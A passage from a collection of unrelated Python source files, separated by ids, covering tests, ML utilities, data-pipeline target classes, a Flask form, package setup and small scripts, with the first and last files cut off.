IntegerType,
StringType,
StructField,
StructType,
)
from butterfree.extract.pre_processing import explode_json_column
from butterfree.testing.dataframe import (
assert_dataframe_equality,
create_df_from_collection,
)
def test_explode_json_column(spark_context, spark_session):
# arrange
input_data = [{"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}'}]
target_data = [
{
"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}',
"a": 123,
"b": "abc",
"c": 123,
"d": [1, 2, 3],
}
]
input_df = create_df_from_collection(input_data, spark_context, spark_session)
target_df = create_df_from_collection(target_data, spark_context, spark_session)
json_column_schema = StructType(
[
StructField("a", IntegerType()),
StructField("b", StringType()),
StructField("c", IntegerType()),
StructField("d", ArrayType(IntegerType())),
]
)
# act
output_df = explode_json_column(input_df, "json_column", json_column_schema)
# arrange
assert_dataframe_equality(target_df, output_df)
|
61470
|
ROTATED_PROXY_ENABLED = True
PROXY_STORAGE = 'scrapy_rotated_proxy.extensions.file_storage.FileProxyStorage'
PROXY_FILE_PATH = ''
# PROXY_STORAGE = 'scrapy_rotated_proxy.extensions.mongodb_storage.MongoDBProxyStorage'
PROXY_MONGODB_HOST = '127.0.0.1'
PROXY_MONGODB_PORT = 27017
PROXY_MONGODB_USERNAME = None
PROXY_MONGODB_PASSWORD = None
PROXY_MONGODB_AUTH_DB = 'admin'
PROXY_MONGODB_DB = 'proxy_management'
PROXY_MONGODB_COLL = 'proxy'
PROXY_MONGODB_COLL_INDEX = []
PROXY_SLEEP_INTERVAL = 60*60*24
PROXY_SPIDER_CLOSE_WHEN_NO_PROXY = True
PROXY_RELOAD_ENABLED = False
|
61540
|
import sys
import os
sys.path.append(os.path.abspath("./"))
from nnst import downloader as downloader
import pprint
import argparse
import nnst.nnst as nnst
parser=argparse.ArgumentParser()
parser.add_argument('--csv_path', help='csv파일 경로')
parser.add_argument('--date', help='시작할 뉴스 일자')
parser.add_argument('--num', help='파싱할 뉴스 개수')
parser.add_argument('--num_train', help='트레이닝셋 사이즈')
csv_path = 'csv/NNST_data.csv'
date = '20180914'
num = 1000
num_train = 900
print(parser.format_help())
args = parser.parse_args().__dict__
if args['csv_path'] is not None:
csv_path = str(args['csv_path'])
if args['date'] is not None:
date = str(args['date'])
if args['num'] is not None:
num = int(args['num'])
if args['num_train'] is not None:
num_train = int(args['num_train'])
downloader.download(num, csv_path, date)
data = nnst.load_data(csv_path)
train, test = nnst.div_dataset(data, train_size=num_train)
print('------train set------')
pprint.pprint(train)
print('---------------------\n')
print('------test set------')
pprint.pprint(test)
print('---------------------\n')
batch = nnst.random_batch(train,batch_size=100)
print('------batch set------')
pprint.pprint(batch)
print('---------------------')
|
61554
|
import pytest
import aos_version
from collections import namedtuple
Package = namedtuple('Package', ['name', 'version'])
expected_pkgs = {
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
},
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
},
}
@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
(
# all found
[Package('spam', '3.2.1'), Package('eggs', '3.2.1')],
expected_pkgs,
),
(
# found with more specific version
[Package('spam', '3.2.1'), Package('eggs', '3.2.1.5')],
expected_pkgs,
),
(
[Package('ovs', '2.6'), Package('ovs', '2.4')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
(
[Package('ovs', '2.7')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
])
def test_check_precise_version_found(pkgs, expected_pkgs_dict):
aos_version._check_precise_version_found(pkgs, expected_pkgs_dict)
@pytest.mark.parametrize('pkgs,expect_not_found', [
(
[],
{
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
},
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # none found
),
(
[Package('spam', '3.2.1')],
{
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # completely missing
),
(
[Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
{
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # not the right version
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5')],
{
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
}
}, # eggs found with multiple versions
),
])
def test_check_precise_version_found_fail(pkgs, expect_not_found):
with pytest.raises(aos_version.PreciseVersionNotFound) as e:
aos_version._check_precise_version_found(pkgs, expected_pkgs)
assert list(expect_not_found.values()) == e.value.problem_pkgs
@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
(
[],
expected_pkgs,
),
(
# more precise but not strictly higher
[Package('spam', '3.2.1.9')],
expected_pkgs,
),
(
[Package('ovs', '2.7')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
])
def test_check_higher_version_found(pkgs, expected_pkgs_dict):
aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
@pytest.mark.parametrize('pkgs,expected_pkgs_dict,expect_higher', [
(
[Package('spam', '3.3')],
expected_pkgs,
['spam-3.3'], # lower precision, but higher
),
(
[Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
expected_pkgs,
['eggs-3.3.2'], # one too high
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
expected_pkgs,
['eggs-3.4'], # multiple versions, one is higher
),
(
[Package('eggs', '3.2.1'), Package('eggs', '3.4'), Package('eggs', '3.3')],
expected_pkgs,
['eggs-3.4'], # multiple versions, two are higher
),
(
[Package('ovs', '2.8')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
['ovs-2.8'],
),
])
def test_check_higher_version_found_fail(pkgs, expected_pkgs_dict, expect_higher):
with pytest.raises(aos_version.FoundHigherVersion) as e:
aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
assert set(expect_higher) == set(e.value.problem_pkgs)
@pytest.mark.parametrize('pkgs', [
[],
[Package('spam', '3.2.1')],
[Package('spam', '3.2.1'), Package('eggs', '3.2.2')],
])
def test_check_multi_minor_release(pkgs):
aos_version._check_multi_minor_release(pkgs, expected_pkgs)
@pytest.mark.parametrize('pkgs,expect_to_flag_pkgs', [
(
[Package('spam', '3.2.1'), Package('spam', '3.3.2')],
['spam'],
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
['eggs'],
),
])
def test_check_multi_minor_release_fail(pkgs, expect_to_flag_pkgs):
with pytest.raises(aos_version.FoundMultiRelease) as e:
aos_version._check_multi_minor_release(pkgs, expected_pkgs)
assert set(expect_to_flag_pkgs) == set(e.value.problem_pkgs)
|
61564
|
import torch
import torch.nn.functional as F
__all__ = ['kl_loss', 'huber_loss']
def kl_loss(x, y):
x = F.softmax(x.detach(), dim=1)
y = F.log_softmax(y, dim=1)
return torch.mean(torch.sum(x * (torch.log(x) - y), dim=1))
def huber_loss(error, delta):
abs_error = torch.abs(error)
quadratic = torch.min(abs_error, torch.full_like(abs_error, fill_value=delta))
losses = 0.5 * (quadratic ** 2) + delta * (abs_error - quadratic)
return torch.mean(losses)
|
61586
|
from . import BasicType
class MaskPosition(BasicType):
fields = {
'point': str,
'x_shift': str,
'y_shift': str,
'scale': str
}
def __init__(self, obj=None):
super(MaskPosition, self).__init__(obj)
@classmethod
def a(cls, point: str, x_shift: str, y_shift: str, scale: str):
return super().a(**locals())
|
61589
|
import os
from setuptools import setup, find_packages
base_dir = os.path.dirname(os.path.abspath(__file__))
setup(
name='hcipy',
version="0.0.1",
description="A pure python library for Bluetooth LE that has minimal dependencies.",
#long_description="\n\n".join([
# open(os.path.join(base_dir, "README.md"), "r").read(),
#]),
long_description="A pure Python module written using only the Python standard library for interacting with the Bluetooth HCI.",
url='https://github.com/TheBubbleworks/python-hcipy',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
license='MIT',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=[],
#tests_require=tests_require,
#test_suite="setup.test_suite",
platforms=['Raspberry Pi', 'Linux'],
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=['Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2',
'Environment :: Console',
'Intended Audience :: Developers',
'Operating System :: POSIX',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
61595
|
from chemeco.wrappers.database import sklearn_db
from chemeco.wrappers.database import cheml_db
from chemeco.wrappers.database import pandas_db
import inspect
def tshf():
"""
tshf stands for the combination of task, subtask, host, and function
:return: combination, dictionary of the aforementioned combinations
"""
# 7 tasks
tasks = ['Enter', 'Represent', 'Prepare', 'Model', 'Search', 'Mix', 'Visualize', 'Store']
extras = ['np', '__builtins__', '__doc__', '__file__', '__name__', '__package__', 'mask', 'Input', 'Output',
'Parameter', 'req', 'regression_types', 'cv_classes']
combination = {task: {} for task in tasks}
all_classes = [k[1] for k in inspect.getmembers(sklearn_db) if k[0][0:2]!='__']
all_classes += [k[1] for k in inspect.getmembers(cheml_db) if k[0][0:2]!='__' ]
all_classes += [k[1] for k in inspect.getmembers(pandas_db) if k[0][0:2]!='__' ]
for k in all_classes:
vk = vars(k)
if 'task' in vk and 'subtask' in vk:
task, subtask, host, function = [vk['task'], vk['subtask'], vk['host'], vk['function']]
if subtask not in combination[task]:
combination[task][subtask] = {host: [function]}
else:
if host not in combination[task][subtask]:
combination[task][subtask][host] = [function]
else:
combination[task][subtask][host].append(function)
return tasks, combination
|
61603
|
import logging
import click
from kfp import dsl
from typing import List, Dict, Callable
import kfp.dsl as dsl
from hypermodel.hml.hml_pipeline import HmlPipeline
from hypermodel.hml.hml_container_op import HmlContainerOp
from hypermodel.platform.abstract.services import PlatformServicesBase
@click.group(name="pipelines")
@click.pass_context
def cli_pipeline_group(context):
pass
class HmlPipelineApp:
def __init__(
self,
name: str,
services: PlatformServicesBase,
cli: click.Group,
image_url: str,
package_entrypoint: str,
envs: Dict[str, str]
):
if name is None or name == "":
raise(TypeError("Parameter: `name` must be supplied"))
if services is None:
raise(TypeError("Parameter: `services` must be supplied"))
if cli is None:
raise(TypeError("Parameter: `cli` must be supplied"))
self.name = name
self.services = services
self.cli_root = cli
self.cli_root.add_command(cli_pipeline_group)
self.envs = envs
self.image_url = image_url
self.package_entrypoint = package_entrypoint
self.pipelines: Dict[str, HmlPipeline] = dict()
self.deploy_callbacks: List[Callable[[HmlContainerOp], HmlContainerOp]] = []
def __getitem__(self, key: str) -> HmlPipeline:
"""
Get a reference to a `HmlPipeline` added to this pipeline
via a call to `self.pipelines`
"""
return self.pipelines[key]
def register_pipeline(self, pipeline_func, cron: str, experiment: str):
"""
Register a Kubeflow Pipeline (e.g. a function decorated with @hml.pipeline)
Args:
pipeline_func (Callable): The function defining the pipline
cron (str): A cron expression for the default job executing this pipelines
experiment (str): The kubeflow experiment to deploy the job to
Returns:
Nonw
"""
pipe = HmlPipeline(
cli=cli_pipeline_group,
pipeline_func=pipeline_func,
services=self.services,
image_url=self.image_url,
package_entrypoint=self.package_entrypoint,
op_builders=self.deploy_callbacks,
envs=self.envs
)
pipe.with_cron(cron)
pipe.with_experiment(experiment)
self.pipelines[pipe.name] = pipe
return pipe
def initialize(self):
for k in self.pipelines:
pipe = self.pipelines[k]
pipe._build_dag()
def on_deploy(self, func: Callable[[HmlContainerOp], HmlContainerOp]):
"""
Registers a function to be called for each ContainerOp defined in the Pipeline
to enable us to configure the Operations within the container with secrets,
environment variables and whatever else may be required.
Args:
func (Callable): The function (accepting a HmlContainerOp as its only parameter)
which configure the supplied HmlContainerOp
"""
self.deploy_callbacks.append(func)
return self
|
61614
|
import os
import requests
from urllib.error import URLError
from urllib.parse import urlparse
from urllib.request import urlopen
from luigi import Target, LocalTarget
from hashlib import sha1
from tasks.util import (query_cartodb, underscore_slugify, OBSERVATORY_PREFIX, OBSERVATORY_SCHEMA)
from tasks.meta import (OBSColumn, OBSTable, metadata, Geometry, Point,
Linestring, OBSColumnTable, OBSTag, current_session)
from sqlalchemy import Table, types, Column
from lib.logger import get_logger
LOGGER = get_logger(__name__)
class PostgresTarget(Target):
'''
PostgresTarget which by default uses command-line specified login.
'''
def __init__(self, schema, tablename, non_empty=True, where="1 = 1"):
self._schema = schema
self._tablename = tablename
self._non_empty = non_empty
self._where = where
@property
def table(self):
return '"{schema}".{tablename}'.format(schema=self._schema,
tablename=self._tablename)
@property
def tablename(self):
return self._tablename
@property
def schema(self):
return self._schema
@property
def qualified_tablename(self):
return '"{}".{}'.format(self.schema, self.tablename)
def _existenceness(self):
'''
Returns 0 if the table does not exist, 1 if it exists but has no
rows (is empty), and 2 if it exists and has one or more rows.
'''
session = current_session()
sql = '''
SELECT COUNT(*) FROM information_schema.tables
WHERE table_schema ILIKE '{schema}'
AND table_name ILIKE '{tablename}'
'''.format(
schema=self._schema,
tablename=self._tablename)
resp = session.execute(sql)
if int(resp.fetchone()[0]) == 0:
return 0
resp = session.execute(
'SELECT row_number() over () FROM "{schema}".{tablename} WHERE {where} LIMIT 1'.format(
schema=self._schema, tablename=self._tablename,
where=self._where))
if resp.fetchone() is None:
return 1
else:
return 2
def empty(self):
'''
Returns True if the table exists but has no rows in it.
'''
return self._existenceness() == 1
def exists(self):
'''
Returns True if the table exists and has at least one row in it.
'''
if self._non_empty:
return self._existenceness() == 2
else:
return self._existenceness() >= 1
def exists_or_empty(self):
'''
Returns True if the table exists, even if it is empty.
'''
return self._existenceness() >= 1
class CartoDBTarget(Target):
'''
Target which is a CartoDB table
'''
def __init__(self, tablename, carto_url=None, api_key=None):
self.tablename = tablename
self.carto_url = carto_url
self.api_key = api_key
def __str__(self):
return self.tablename
def exists(self):
resp = query_cartodb(
'SELECT row_number() over () FROM "{tablename}" LIMIT 1'.format(
tablename=self.tablename),
api_key=self.api_key,
carto_url=self.carto_url)
if resp.status_code != 200:
return False
return resp.json()['total_rows'] > 0
def remove(self, carto_url=None, api_key=None):
api_key = api_key or os.environ['CARTODB_API_KEY']
try:
while True:
resp = requests.get('{url}/api/v1/tables/{tablename}?api_key={api_key}'.format(
url=carto_url,
tablename=self.tablename,
api_key=api_key
))
viz_id = resp.json()['id']
# delete dataset by id DELETE
# https://observatory.cartodb.com/api/v1/viz/ed483a0b-7842-4610-9f6c-8591273b8e5c
try:
requests.delete('{url}/api/v1/viz/{viz_id}?api_key={api_key}'.format(
url=carto_url,
viz_id=viz_id,
api_key=api_key
), timeout=1)
except requests.Timeout:
pass
except ValueError:
pass
query_cartodb('DROP TABLE IF EXISTS {tablename}'.format(tablename=self.tablename))
assert not self.exists()
class ColumnTarget(Target):
'''
'''
def __init__(self, column, task):
self._id = column.id
self._task = task
self._column = column
def get(self, session):
'''
Return a copy of the underlying OBSColumn in the specified session.
'''
with session.no_autoflush:
return session.query(OBSColumn).get(self._id)
def update_or_create(self):
self._column = current_session().merge(self._column)
def exists(self):
existing = self.get(current_session())
new_version = float(self._column.version or 0.0)
if existing:
existing_version = float(existing.version or 0.0)
current_session().expunge(existing)
else:
existing_version = 0.0
if existing and existing_version == new_version:
return True
elif existing and existing_version > new_version:
raise Exception('Metadata version mismatch: cannot run task {task} '
'(id "{id}") '
'with ETL version ({etl}) older than what is in '
'DB ({db})'.format(task=self._task.task_id,
id=self._id,
etl=new_version,
db=existing_version))
return False
class TagTarget(Target):
'''
'''
def __init__(self, tag, task):
self._id = tag.id
self._tag = tag
self._task = task
_tag_cache = {}
def get(self, session):
'''
Return a copy of the underlying OBSTag in the specified session.
'''
if not self._tag_cache.get(self._id, None):
with session.no_autoflush:
self._tag_cache[self._id] = session.query(OBSTag).get(self._id)
return self._tag_cache[self._id]
def update_or_create(self):
with current_session().no_autoflush:
self._tag = current_session().merge(self._tag)
def exists(self):
session = current_session()
existing = self.get(session)
new_version = self._tag.version or 0.0
if existing:
if existing in session:
session.expunge(existing)
existing_version = existing.version or 0.0
if float(existing_version) == float(new_version):
return True
if existing_version > new_version:
raise Exception('Metadata version mismatch: cannot run task {task} '
'(id "{id}") '
'with ETL version ({etl}) older than what is in '
'DB ({db})'.format(task=self._task.task_id,
id=self._id,
etl=new_version,
db=existing_version))
return False
class TableTarget(Target):
def __init__(self, schema, name, obs_table, columns, task):
'''
columns: should be an ordereddict if you want to specify columns' order
in the table
'''
self._id = '.'.join([schema, name])
obs_table.id = self._id
obs_table.tablename = '{prefix}{name}'.format(prefix=OBSERVATORY_PREFIX, name=sha1(
underscore_slugify(self._id).encode('utf-8')).hexdigest())
self.table = '{schema}.{table}'.format(schema=OBSERVATORY_SCHEMA, table=obs_table.tablename)
self.qualified_tablename = '"{schema}".{table}'.format(schema=OBSERVATORY_SCHEMA, table=obs_table.tablename)
self.obs_table = obs_table
self._tablename = obs_table.tablename
self._schema = schema
self._name = name
self._obs_dict = obs_table.__dict__.copy()
self._columns = columns
self._task = task
if obs_table.tablename in metadata.tables:
self._table = metadata.tables[obs_table.tablename]
else:
self._table = None
@property
def tablename(self):
return self._tablename
@property
def schema(self):
return 'observatory'
def sync(self):
'''
Whether this data should be synced to carto. Defaults to True.
'''
return True
def exists(self):
'''
We always want to run this at least once, because we can always
regenerate tabular data from scratch.
'''
session = current_session()
existing = self.get(session)
new_version = float(self.obs_table.version or 0.0)
if existing:
existing_version = float(existing.version or 0.0)
if existing in session:
session.expunge(existing)
else:
existing_version = 0.0
if existing and existing_version == new_version:
resp = session.execute(
'SELECT COUNT(*) FROM information_schema.tables '
"WHERE table_schema = '{schema}' "
" AND table_name = '{tablename}' ".format(
schema='observatory',
tablename=existing.tablename))
if int(resp.fetchone()[0]) == 0:
return False
resp = session.execute(
'SELECT row_number() over () '
'FROM "{schema}".{tablename} LIMIT 1 '.format(
schema='observatory',
tablename=existing.tablename))
return resp.fetchone() is not None
elif existing and existing_version > new_version:
raise Exception('Metadata version mismatch: cannot run task {task} '
'(id "{id}") '
'with ETL version ({etl}) older than what is in '
'DB ({db})'.format(task=self._task.task_id,
id=self._id,
etl=new_version,
db=existing_version))
return False
def get(self, session):
'''
Return a copy of the underlying OBSTable in the specified session.
'''
with session.no_autoflush:
return session.query(OBSTable).get(self._id)
def update_or_create_table(self):
session = current_session()
# create new local data table
columns = []
for colname, coltarget in list(self._columns.items()):
colname = colname.lower()
col = coltarget.get(session)
# Column info for sqlalchemy's internal metadata
if col.type.lower() == 'geometry':
coltype = Geometry
elif col.type.lower().startswith('geometry(point'):
coltype = Point
elif col.type.lower().startswith('geometry(linestring'):
coltype = Linestring
# For enum type, pull keys from extra["categories"]
elif col.type.lower().startswith('enum'):
cats = list(col.extra['categories'].keys())
coltype = types.Enum(*cats, name=col.id + '_enum')
else:
coltype = getattr(types, col.type.capitalize())
columns.append(Column(colname, coltype))
obs_table = self.get(session) or self.obs_table
# replace local data table
if obs_table.id in metadata.tables:
metadata.tables[obs_table.id].drop()
self._table = Table(obs_table.tablename, metadata, *columns,
extend_existing=True, schema='observatory')
session.commit()
self._table.drop(checkfirst=True)
self._table.create()
def update_or_create_metadata(self, _testmode=False):
session = current_session()
# replace metadata table
self.obs_table = session.merge(self.obs_table)
obs_table = self.obs_table
for i, colname_coltarget in enumerate(self._columns.items()):
colname, coltarget = colname_coltarget
colname = colname.lower()
col = coltarget.get(session)
if _testmode:
coltable = OBSColumnTable(colname=colname, table=obs_table,
column=col)
else:
# Column info for obs metadata
coltable = session.query(OBSColumnTable).filter_by(
column_id=col.id, table_id=obs_table.id).first()
if coltable:
coltable.colname = colname
else:
# catch the case where a column id has changed
coltable = session.query(OBSColumnTable).filter_by(
table_id=obs_table.id, colname=colname).first()
if coltable:
coltable.column = col
else:
coltable = OBSColumnTable(colname=colname, table=obs_table,
column=col)
session.add(coltable)
class RepoTarget(LocalTarget):
def __init__(self, schema, tablename, repo_dir, resource_id, version, filename):
self.format = None
self.is_tmp = False
self.schema = schema
self.tablename = tablename
self.repo_dir = repo_dir
self.resource_id = resource_id
self.version = version
self.filename = filename
@property
def path(self):
path = self._get_path()
if path and os.path.isfile(path):
return path
else:
return self._build_path()
def _build_path(self):
return os.path.join(self.repo_dir, self.resource_id, str(self.version), self.filename)
def _get_path(self):
path = None
query = '''
SELECT path FROM "{schema}".{table}
WHERE id = '{resource_id}'
AND version = {version}
'''.format(schema=self.schema,
table=self.tablename,
resource_id=self.resource_id,
version=self.version)
try:
result = current_session().execute(query).fetchone()
if result:
path = result[0]
except:
path = None
return path
def exists(self):
path = self._get_path()
return path and os.path.isfile(path)
class ConstraintExistsTarget(Target):
def __init__(self, schema, table, constraint):
self.schema = schema
self.tablename = table
self.constraint = constraint
self.session = current_session()
@property
def table(self):
return '"{schema}".{tablename}'.format(schema=self.schema,
tablename=self.tablename)
def exists(self):
sql = "SELECT 1 FROM information_schema.constraint_column_usage " \
"WHERE table_schema = '{schema}' " \
" AND table_name ilike '{table}' " \
" AND constraint_name = '{constraint}'"
check = sql.format(schema=self.schema,
table=self.tablename,
constraint=self.constraint)
return len(self.session.execute(check).fetchall()) > 0
class PostgresFunctionTarget(Target):
def __init__(self, schema, function_name):
self._schema = schema
self._function_name = function_name
self._session = current_session()
@property
def function(self):
return '"{schema}".{function_name}'.format(schema=self._schema,
function_name=self._function_name)
@property
def function_name(self):
return self._function_name
@property
def schema(self):
return self._schema
def exists(self):
query = '''
SELECT 1 FROM information_schema.routines
WHERE routine_schema = '{schema}'
AND routine_name = '{function_name}'
'''.format(
schema=self._schema,
function_name=self._function_name)
return len(self._session.execute(query).fetchall()) > 0
class URLTarget(Target):
'''
Accepts both local paths and urls
'''
def __init__(self, url):
self.path = url
scheme = urlparse(url).scheme
if scheme == '':
self.url = 'file://{}'.format(url)
else:
self.url = url
def exists(self):
try:
urlopen(self.url)
return True
except URLError:
return False
|
61622
|
from flask_wtf import FlaskForm
from wtforms import HiddenField, FloatField, SelectField, StringField, SubmitField, ValidationError
from wtforms.ext.sqlalchemy.fields import QuerySelectField
from wtforms.validators import Length, Optional, Required
from .. models import EventFrameAttributeTemplate, Lookup, LookupValue, UnitOfMeasurement
class EventFrameAttributeTemplateForm(FlaskForm):
name = StringField("Name", validators = [Required(), Length(1, 45)])
description = StringField("Description", validators = [Length(0, 255)])
lookup = QuerySelectField("Lookup", validators = [Required()], get_label = "Name")
defaultStartLookupValue = SelectField("Default Start Value", validators = [Optional()], coerce = float)
defaultEndLookupValue = SelectField("Default End Value", validators = [Optional()], coerce = float)
unitOfMeasurement = QuerySelectField("Unit", query_factory = lambda: UnitOfMeasurement.query. \
order_by(UnitOfMeasurement.Abbreviation), get_label = "Abbreviation")
defaultStartValue = FloatField("Default Start Value", validators = [Optional()])
defaultEndValue = FloatField("Default End Value", validators = [Optional()])
eventFrameAttributeTemplateId = HiddenField()
eventFrameTemplateId = HiddenField()
requestReferrer = HiddenField()
submit = SubmitField("Save")
def validate_name(self, field):
validationError = False
eventFrameAttributeTemplate = EventFrameAttributeTemplate.query.filter_by(EventFrameTemplateId = self.eventFrameTemplateId.data,
Name = field.data).first()
if eventFrameAttributeTemplate:
if self.eventFrameAttributeTemplateId.data == "":
# Trying to add a new eventFrameAttributeTemplate using a name that already exists.
validationError = True
else:
if int(self.eventFrameAttributeTemplateId.data) != eventFrameAttributeTemplate.EventFrameAttributeTemplateId:
# Trying to change the name of an eventFrameAttributeTemplate to a name that already exists.
validationError = True
if validationError:
raise ValidationError('The name "{}" already exists.'.format(field.data))
|
61645
|
from __future__ import print_function
def one(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # one
a = b = c['side'] = 'effect'
two()
def two(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # two
a = b = c['side'] = 'effect'
three()
def three(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # three
a = b = c['side'] = 'effect'
four()
def four(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # four
a = b = c['side'] = 'effect'
five()
def five(a=123, b='234', c={'3': [4, '5']}):
six()
six()
six()
a = b = c['side'] = in_five = 'effect'
for i in range(1): # five
return i # five
def six():
pass
if __name__ == "__main__":
from hunter import *
from utils import DebugCallPrinter
trace(
Backlog(stack=15, vars=True, action=DebugCallPrinter(' [' 'backlog' ']'), function='five').filter(~Q(function='six')),
action=DebugCallPrinter
)
one()
one() # make sure Backlog is reusable (doesn't have storage side-effects)
stop()
|
61670
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
print("VAR is '{}'".format(os.environ["VAR"]))
|
61685
|
class CRSError(Exception):
pass
class DriverError(Exception):
pass
class TransactionError(RuntimeError):
pass
class UnsupportedGeometryTypeError(Exception):
pass
class DriverIOError(IOError):
pass
|
61697
|
import pprint
from pathlib import Path
from typing import Optional
import typer
from embeddings.defaults import RESULTS_PATH
from embeddings.evaluator.sequence_labeling_evaluator import SequenceLabelingEvaluator
from embeddings.pipeline.flair_sequence_labeling import FlairSequenceLabelingPipeline
app = typer.Typer()
def run(
embedding_name: str = typer.Option(
"allegro/herbert-base-cased", help="Hugging Face embedding model name or path."
),
dataset_name: str = typer.Option(
"clarin-pl/kpwr-ner", help="Hugging Face dataset name or path."
),
input_column_name: str = typer.Option(
"tokens", help="Column name that contains text to classify."
),
target_column_name: str = typer.Option(
"ner", help="Column name that contains tag labels for POS tagging."
),
root: str = typer.Option(RESULTS_PATH.joinpath("pos_tagging")),
hidden_size: int = typer.Option(256, help="Number of hidden states in RNN."),
evaluation_mode: SequenceLabelingEvaluator.EvaluationMode = typer.Option(
SequenceLabelingEvaluator.EvaluationMode.CONLL,
help="Evaluation mode. Supported modes: [unit, conll, strict].",
),
tagging_scheme: Optional[SequenceLabelingEvaluator.TaggingScheme] = typer.Option(
None, help="Tagging scheme. Supported schemes: [IOB1, IOB2, IOE1, IOE2, IOBES, BILOU]"
),
) -> None:
typer.echo(pprint.pformat(locals()))
output_path = Path(root, embedding_name, dataset_name)
output_path.mkdir(parents=True, exist_ok=True)
pipeline = FlairSequenceLabelingPipeline(
embedding_name,
dataset_name,
input_column_name,
target_column_name,
output_path,
hidden_size,
evaluation_mode,
tagging_scheme,
)
result = pipeline.run()
typer.echo(pprint.pformat(result))
typer.run(run)
|
61805
|
import os
from rlib.streamio import open_file_as_stream
from rlib.string_stream import StringStream
from som.compiler.class_generation_context import ClassGenerationContext
from som.interp_type import is_ast_interpreter
if is_ast_interpreter():
from som.compiler.ast.parser import Parser
else:
from som.compiler.bc.parser import Parser
def compile_class_from_file(path, filename, system_class, universe):
fname = path + os.sep + filename + ".som"
try:
input_file = open_file_as_stream(fname, "r")
try:
parser = Parser(input_file, fname, universe)
result = _compile(parser, system_class, universe)
finally:
input_file.close()
except OSError:
raise IOError()
cname = result.get_name()
cname_str = cname.get_embedded_string()
if filename != cname_str:
from som.vm.universe import error_println
error_println(
"File name %s does not match class name %s." % (filename, cname_str)
)
universe.exit(1)
return result
def compile_class_from_string(stream, system_class, universe):
parser = Parser(StringStream(stream), "$str", universe)
result = _compile(parser, system_class, universe)
return result
def _compile(parser, system_class, universe):
cgc = ClassGenerationContext(universe)
result = system_class
parser.classdef(cgc)
if not system_class:
result = cgc.assemble()
else:
cgc.assemble_system_class(result)
return result
|
61827
|
import numpy as np
from opytimizer.optimizers.swarm import sso
from opytimizer.spaces import search
def test_sso_params():
params = {
'C_w': 0.1,
'C_p': 0.4,
'C_g': 0.9
}
new_sso = sso.SSO(params=params)
assert new_sso.C_w == 0.1
assert new_sso.C_p == 0.4
assert new_sso.C_g == 0.9
def test_sso_params_setter():
new_sso = sso.SSO()
try:
new_sso.C_w = 'a'
except:
new_sso.C_w = 0.1
try:
new_sso.C_w = -1
except:
new_sso.C_w = 0.1
assert new_sso.C_w == 0.1
try:
new_sso.C_p = 'b'
except:
new_sso.C_p = 0.4
try:
new_sso.C_p = 0.05
except:
new_sso.C_p = 0.4
assert new_sso.C_p == 0.4
try:
new_sso.C_g = 'c'
except:
new_sso.C_g = 0.9
try:
new_sso.C_g = 0.35
except:
new_sso.C_g = 0.9
assert new_sso.C_g == 0.9
def test_sso_compile():
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
try:
new_sso.local_position = 1
except:
new_sso.local_position = np.array([1])
assert new_sso.local_position == np.array([1])
def test_sso_evaluate():
def square(x):
return np.sum(x**2)
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
new_sso.evaluate(search_space, square)
def test_sso_update():
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
new_sso.update(search_space)
|
61830
|
import matplotlib.pyplot as plt
import netomaton as ntm
import numpy as np
if __name__ == '__main__':
# NKS page 443 - Rule 122R
network = ntm.topology.cellular_automaton(n=100)
# carefully chosen initial conditions
previous_state = [1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1,
0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 0,
1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1,
0, 0, 1, 1]
